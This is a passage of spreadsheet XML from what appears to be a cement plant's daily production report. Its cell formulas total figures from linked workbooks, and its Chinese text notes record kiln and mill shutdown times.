      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]29'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]29'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]29'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]29'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]29'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]29'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]29'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]29'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]29'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]29'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]29'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'28'!H41</f>
        <v>20037</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>145013</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]29'!$I$16</f>
        <v>867.08</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'28'!K41</f>
        <v>25448.81</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>146842.35</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]29'!$L$16</f>
        <v>20717.95</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>69.0598333333333</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]29'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]29'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]29'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'28'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]29'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'28'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]29'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]29'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]29'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'28'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]29'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'28'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]29'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]29'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]29'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]29'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'28'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]29'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'28'!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]29'!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]29'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]29'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'28'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]29'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'28'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]29'!$L$14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'[12]29'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'28'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]29'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'28'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]29'!$L$15</f>
        <v>52110.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]29'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]29'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]29'!$R$29</f>
        <v>715.440000000001</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'28'!U44</f>
        <v>7190.1</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>71943.268</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]29'!$V$29</f>
        <v>159</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'28'!X44</f>
        <v>5284</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>71694</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]29'!$Y$29</f>
        <v>4205.557</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]29'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'28'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]29'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'28'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]29'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]29'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]29'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]29'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]29'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]29'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]29'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]29'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]29'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'28'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'28'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]29'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]29'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]29'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'28'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]29'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'28'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]29'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'28'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'28'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]29'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]29'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]29'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'28'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]29'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'28'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]29'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'28'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'28'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]29'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]29'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]29'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'28'!U48</f>
        <v>1032.38</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>7058.91</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]29'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'28'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]29'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'28'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'28'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]29'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]29'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]29'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'28'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]29'!$V$8</f>
        <v>727.05</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'28'!X49</f>
        <v>6429.5689</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>182959.9089</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]29'!$Y$8</f>
        <v>4164.05610000004</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'28'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'28'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]29'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]29'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]29'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'28'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]29'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'28'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]29'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]29'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]29'!$E$24</f>
        <v>4656</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'28'!H51</f>
        <v>123038.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1499437.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]29'!$I$24</f>
        <v>4896.94</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'28'!K51</f>
        <v>138774.484</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1501898.415</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]29'!$L$24</f>
        <v>32963.1999999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>73.2515555555551</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]29'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]29'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]29'!$R$30</f>
        <v>147.910000000001</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'28'!U51</f>
        <v>5183.11</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>68181.581</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]29'!$V$30</f>
        <v>193.5</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'28'!X51</f>
        <v>5177.288</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>65793.525</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]29'!$Y$30</f>
        <v>3257.19600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]29'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]29'!$E$19</f>
        <v>5855.38000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'28'!H52</f>
        <v>48429.0700000006</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1431996.32</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]29'!$I$19</f>
        <v>6725.07</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'28'!K52</f>
        <v>114816.443</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1396510.643</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]29'!$L$19</f>
        <v>38659.0700000508</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>26.6614275862419</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'[13]29'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]29'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'28'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]29'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'28'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]29'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]29'!$M$21+'[14]29'!$M$22+'[14]29'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]29'!$N$21+'[14]29'!$N$22+'[14]29'!$N$35</f>
        <v>41.14</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'28'!U53</f>
        <v>1262.27</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39596.697</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]29'!$Q$21+'[14]29'!$Q$22+'[14]29'!$Q$35</f>
        <v>0</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'28'!X53</f>
        <v>998</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40489</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]29'!$T$21+'[14]29'!$T$22+'[14]29'!$T$35</f>
        <v>1913.217</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]29'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'28'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]29'!$I$47</f>
        <v>3029.85</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'28'!K54</f>
        <v>13702.495</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>225144.345</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]29'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]29'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]29'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]29'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'28'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]29'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'28'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]29'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]29'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'28'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]29'!$I$63</f>
        <v>136.779999999999</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'28'!K55</f>
        <v>8538.168</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>43973.818</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]29'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]29'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]29'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]29'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]29'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]29'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]29'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]29'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]29'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'28'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'28'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]29'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：0:00-22:50续停；2#磨：正常；3#磨：8:00-24:00避峰停机；4#磨：10:00-23:20避峰停机。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G57+'28'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'28'!K57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G58+'28'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'28'!K58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G59+'28'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'28'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]29'!$Q$65</f>
        <v>窑:错峰续停。A组磨：8:20-24:00避峰停机。D1#磨：9:10-22:00避峰停机，D2#磨：9:10-22:00避峰停机。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G60+'28'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
